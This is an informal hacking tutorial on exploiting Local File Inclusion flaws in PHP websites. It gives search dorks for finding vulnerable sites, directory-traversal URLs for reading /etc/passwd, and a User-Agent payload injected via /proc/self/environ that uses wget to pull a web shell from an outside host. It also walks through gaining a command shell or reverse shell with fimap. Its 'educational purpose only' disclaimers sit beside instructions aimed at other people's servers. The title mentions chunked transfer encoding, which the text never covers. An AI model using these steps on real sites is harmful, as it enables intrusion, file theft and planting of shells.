LFI bounce using chunked transfer encoding
Local File Inclusion (also known as LFI)
is the process of including files on a server through the web browser. This
vulnerability occurs when a page include is not properly sanitized, and allows
directory traversal characters to be injected.
The vuln. Code looks like :
<?php
$file = $_GET['file'];
if(isset($file))
{
include("pages/$file");
}
else
……….
……..
?>
Here from the code you can observe that its
taking or including the file from locally.
To get LFI vuln sites use dork like :: inurl:php?id=*.php
The “ *.php” means that any file name with
extension .php
Ex: inrul:php?page=contact.php, contactus.ph etc.
Or inurl:.php?file=somefile.php
(* im not Responsible for any of the actions for
what you do , Just Educational purpose only)
There are
two ways : Manual and automated.
MANUAL
way for LFI:
proc/self/environ method:
check for vuln site same as above
then:
Now lets check for etc/passwd to
see the if is Local File Inclusion vulnerable.Lets make a request :
http://www.website.com/view.php?page=../etc/passwd
we got error and no etc/passwd file.
*so we go more directories up
http://www.website.com/view.php?page=../../etc/passwd
If you get like:
we succesfully included the etc/passwd file.
The check for /proc/self/environ (in place of
/etc/passwd) we get message like :
The we need Tamper data addon on firefox :
Choose Tamper and in User-Agent filed write
the following code :
<?system('wget
http://site.com/shel.txt -O shel.php');?>
Then submit the request.
(*here shel.txt must contain the shel code
where we are getting from other site using wget command*)
Tada !.
shel uploaded. J
Warning:
I am not responsible for your actions , please be
careful.this is for educational purpose only.
--------------------------------------------------------------------------------
Automated:
now remove the file name in the url and replace
with “ ../ “ (without quotes)
if you get error like ::
Warning:
include_once(../) [function.include-once]:
failed to open stream: Inappropriate ioctl for device in /home/sitname
/public_html/index.php on line 10
Warning: include_once() [function.include]: Failed
opening '../' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php')
in/home/sitename/public_html/index.php on line 10
It is vulnerable to LFI
Now to
attack :
You need a python script called “ fimap “ which
can be downloaded from google
U need python installed to execute it.
Open cmd prompt goto the folder where fimap.py
script is present and type ::
“ fimap.py –u www.site.com/file.php?page=file.php
“
( -u
:- option for scan if vuln exists or
not)
It tests for injecting a file where it is
vulnerable : looks like this
Here from the above pic u can see at the bottom
with : “ [1] /proc/self/environ “
0 (0- Clean/readable ,
1- writable)
Now to exploit :: type:
“ fimap.py
–x www.site.com/file.php?page=file.php “
(-x : to
exploit ; -u : scan for vuln).
Now you will find like this :
Choose domain , well here u need to choose a
number here my option is “9” ,the thing here is the fimap stores the history of
successful exploiting . so choose number corresponding to the domain which u
have scanned.
After that it asks for options again to choose
type vuln script (choose the number ,if there is only one script the type 1).
Then again it asks for type of available attacks
: they are:
1.spawn fimap shell
2.pentest monkey reverse shell
Select option 1.
It will successfully inject
Tada ! you
get the command prompt of the host.
( as for
pentest monkey shell ,you need netcat and an open port to get the connection
back.)
Warning:
I am not responsible for your actions , please be
careful.this is for educational purpose only.
You hardly
find LFI vuln sites ,you need work ur ass off to get the sites.
--------------------------------------------------------------------------------------------------------